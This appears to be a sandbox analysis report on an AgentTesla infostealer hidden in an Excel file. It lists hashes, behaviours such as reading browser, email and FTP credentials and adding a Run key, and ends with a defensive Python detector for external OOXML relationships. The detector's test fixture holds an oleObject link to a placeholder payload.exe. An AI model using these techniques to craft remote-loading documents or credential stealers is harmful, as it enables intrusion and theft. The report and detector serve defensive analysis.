General

  • Target

    8549cb420ed5c1edf32b7e28d9d2010dac4867c0dba3650e1f8e7655278d4c5b.zip

  • Size

    283KB

  • Sample

    240118-ghblmsdgcm

  • MD5

    a5df9baff836278a7b6ecf187976b190

  • SHA1

    ea8002dab926a32885cff76936baf1de60ea33b8

  • SHA256

    f8107dcd6388dddcd4133a3bd3bbfb6a12b5ce3b17b2b0b3ec59e23c9771ba5b

  • SHA512

    28684f07c21e47a662a4375850aa3d7ffa20c4782ec8d84c0df852bad79708aec5127c928fcdeaaded10a7c4149fa8cebbf2408d61573b5f38687b6e696a7a2d

  • SSDEEP

    6144:2xo4R4SpAmNYDBkUlXsv6RXL0d7K4r4HCj1TJzRyLZq:Qf5pAmiDlXgk87Kcbg8

Malware Config

Extracted

Family

agenttesla

Credentials

Targets

    • Target

      8549cb420ed5c1edf32b7e28d9d2010dac4867c0dba3650e1f8e7655278d4c5b.xls

    • Size

      302KB

    • MD5

      250841072f7bb27d6a75cd026249bb87

    • SHA1

      190342d9c712d9af9a3dce9eb3f2ff32bf100e23

    • SHA256

      8549cb420ed5c1edf32b7e28d9d2010dac4867c0dba3650e1f8e7655278d4c5b

    • SHA512

      27435486bd6eec7c591ec5388aec063d0ceb6f7198bda22dcb5c01dab11aaf878fa5d4b8723fefcb1983387e011100effd1e39d9e38f5b5511e2b1c997b788f0

    • SSDEEP

      6144:6vBNSHBMixiMK6G+ZFrTUvCp4sJgo0r6Rz4rN9RjymY7TaGv37Aodpz:6vBNQpozwjTqCfgo0ugNymWbvrf3

    • AgentTesla

      Agent Tesla is a .NET infostealer and remote access tool (RAT), originally written in Visual Basic .NET.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Abuses OpenXML format to download file from external location

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk, which infostealers often target.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext
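The signature "Abuses OpenXML format to download file from external location" refers to a relationship inside the .xls/.xlsx package's `.rels` parts whose `TargetMode` is `External`: Office resolves the `Target` URL when the document opens, which is how a spreadsheet fetches a second-stage payload. The following Python script is an added example, not code from tria.ge or from the sample on this page. It scans an OOXML package for external relationships and flags the ones worth triaging (oleObject, attachedTemplate, frame, image, package, or any external link straight to an executable). The package it scans is a minimal OOXML-style zip constructed in memory; the `example.invalid` URL and relationship IDs are placeholders, not indicators from this sample.

```python
"""
Find OOXML relationships that point outside the package (TargetMode="External"),
the mechanism behind the sandbox signature "Abuses OpenXML format to download
file from external location". Added example; the scanned package is constructed
below, not the sample from the report.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Relationship types that should rarely point at an external location.
# A plain hyperlink is normal; an external oleObject/attachedTemplate/frame
# is the remote-template / remote-object loading trick.
SUSPICIOUS_TYPES = ("oleObject", "attachedTemplate", "frame", "image", "package")
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".hta", ".vbs", ".js")


def find_external_relationships(package: bytes):
    """Return (rels_part, rel_id, short_type, target) for every relationship with
    TargetMode="External". Unparseable .rels parts are reported, not skipped."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append((name, None, "unparseable", None))
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                # Type is a long URI; keep only the last path segment (e.g. oleObject).
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append((name, rel.get("Id"), short_type, rel.get("Target")))
    return findings


def classify(findings):
    """Keep findings that indicate remote payload loading rather than an ordinary
    hyperlink: suspicious relationship type, a URL ending in an executable
    extension, or a .rels part that could not be parsed (possible evasion)."""
    flagged = []
    for rels_part, rel_id, short_type, target in findings:
        is_url = bool(re.match(r"^(https?|ftp|file)://", target or "", re.I))
        exe_target = is_url and target.lower().rstrip("/").endswith(EXECUTABLE_EXT)
        if short_type == "unparseable" or short_type in SUSPICIOUS_TYPES or exe_target:
            flagged.append((rels_part, rel_id, short_type, target))
    return flagged


def build_sample_package() -> bytes:
    """Constructed minimal spreadsheet-like OOXML package (assumption: not the real
    sample). One benign hyperlink and one external oleObject in the sheet .rels."""
    root_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/>
</Relationships>"""
    sheet_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://example.invalid/payload.exe" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # To scan a real document: open(path, "rb").read() in place of the constructed package.
    for finding in classify(find_external_relationships(build_sample_package())):
        print("external relationship:", finding)
```

Run the same two functions over the extracted `.xls` from the zip in this report (or any `.docx`/`.xlsx`) to see which part carries the external target; the hyperlink is deliberately left unflagged so the output is the one relationship an analyst should actually chase.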

MITRE ATT&CK Enterprise v15

Tasks